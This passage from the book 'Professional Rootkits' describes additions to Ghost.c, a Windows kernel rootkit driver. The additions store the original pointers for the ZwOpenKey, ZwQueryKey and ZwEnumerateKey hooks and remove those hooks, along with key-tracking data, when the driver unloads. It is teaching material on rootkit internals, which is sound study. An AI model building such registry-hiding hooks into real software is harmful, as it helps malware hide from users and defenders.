Ghost.c


The file Ghost.c was modified to include registryManager.h, define the storage variables for the hooked functions, unhook the three registry key kernel hooks added in hookManager.c, and call the key data cleanup function.

Here are the additions to the top of Ghost.c:

  #include "registryManager.h"

  // Storage for the original addresses of the hooked registry functions
  ZWOPENKEY OldZwOpenKey;
  ZWQUERYKEY OldZwQueryKey;
  ZWENUMERATEKEY OldZwEnumerateKey;

And here are the additions to OnUnload:

  // Remove the three registry key hooks added in hookManager.c
  UNHOOK( ZwOpenKey, OldZwOpenKey );
  UNHOOK( ZwQueryKey, OldZwQueryKey );
  UNHOOK( ZwEnumerateKey, OldZwEnumerateKey );
  // Release the key data
  FreeKeyTrackingData();




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler
